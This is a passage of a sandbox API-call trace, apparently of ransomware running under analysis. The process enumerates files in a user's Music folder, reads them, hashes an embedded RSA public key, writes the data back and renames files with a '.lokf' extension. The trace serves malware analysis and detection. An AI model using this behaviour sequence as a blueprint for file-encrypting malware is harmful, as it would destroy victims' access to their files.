Flags=0x0, Size=0x4) returned 0x3278f30 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0058.990] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b358 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b328 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6ad10 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6acc8 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad40 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b370 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6acc8 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad40 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f00 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b340 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b340 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c71640 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6acc8 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x32947b0 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x326a688 [0058.991] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0058.991] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b340 | out: hHeap=0x660000) returned 1 [0058.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x32949c8 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0058.992] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32949c8 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b370 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b358 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b328 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b310 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82f50 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0058.992] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0058.993] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c83710*, nNumberOfBytesToWrite=0xa786, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c83710*, lpNumberOfBytesWritten=0x9f4fb14*=0xa786, lpOverlapped=0x0) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c83710 | out: hHeap=0x660000) returned 1 [0058.993] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa78b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.993] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0058.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0058.993] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0058.993] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.993] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0058.993] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0058.993] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0058.993] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0058.994] CloseHandle (hObject=0x5cc) returned 1 [0058.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x70) returned 0x32695e0 [0058.994] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x870) returned 0x3268798 [0058.994] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32695e0 | out: hHeap=0x660000) returned 1 [0058.994] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\klr3tCyH3.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\klr3tcyh3.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\klr3tCyH3.wav.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\klr3tcyh3.wav.lokf")) returned 1 [0058.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0058.995] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0058.995] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0058.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3289860 | out: hHeap=0x660000) returned 1 [0058.996] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x8b298c90, ftLastAccessTime.dwHighDateTime=0x1d4d546, ftLastWriteTime.dwLowDateTime=0x8b298c90, ftLastWriteTime.dwHighDateTime=0x1d4d546, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m4--j", cAlternateFileName="")) returned 1 [0058.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc70 [0058.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bc08 [0058.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bb38 [0058.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc08 | out: hHeap=0x660000) returned 1 [0058.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bc70 | out: hHeap=0x660000) returned 1 [0058.996] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa189ea80, ftCreationTime.dwHighDateTime=0x1d4d1d0, ftLastAccessTime.dwLowDateTime=0x37d1b3a0, ftLastAccessTime.dwHighDateTime=0x1d4d402, ftLastWriteTime.dwLowDateTime=0x37d1b3a0, ftLastWriteTime.dwHighDateTime=0x1d4d402, nFileSizeHigh=0x0, nFileSizeLow=0xbb00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YHNtYWD7HeLx42k.mp3", cAlternateFileName="YHNTYW~1.MP3")) returned 1 [0058.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x50) returned 0x3261058 [0058.996] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x76) returned 0x3289860 [0058.996] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261058 | out: hHeap=0x660000) returned 1 [0058.996] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YHNtYWD7HeLx42k.mp3") returned=".mp3" [0058.996] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\YHNtYWD7HeLx42k.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\yhntywd7helx42k.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0058.996] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=47872) returned 1 [0058.997] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0058.999] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xbada, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.999] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.000] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0059.000] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0xbb00, lpOverlapped=0x0) returned 1 [0059.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.000] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.000] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.000] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0059.001] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.001] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.001] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.001] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.001] GetLastError () returned 0x0 [0059.001] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.001] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0059.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.001] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.001] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.001] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.001] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbb00) returned 0x9c83710 [0059.001] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296560 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82f50 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b310 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c82f98 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b328 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b358 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6b370 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.002] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c71640 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0059.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b358 | out: hHeap=0x660000) returned 1 [0059.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b370 | out: hHeap=0x660000) returned 1 [0059.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ad10 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b370 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b358 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x326a688 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.002] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a688 | out: hHeap=0x660000) returned 1 [0059.002] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b370 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b358 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ad10 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c71640 | out: hHeap=0x660000) returned 1 [0059.003] GetCurrentThreadId () returned 0x9e0 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c7d6e8 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.003] GetCurrentThreadId () returned 0x9e0 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.003] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.003] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) 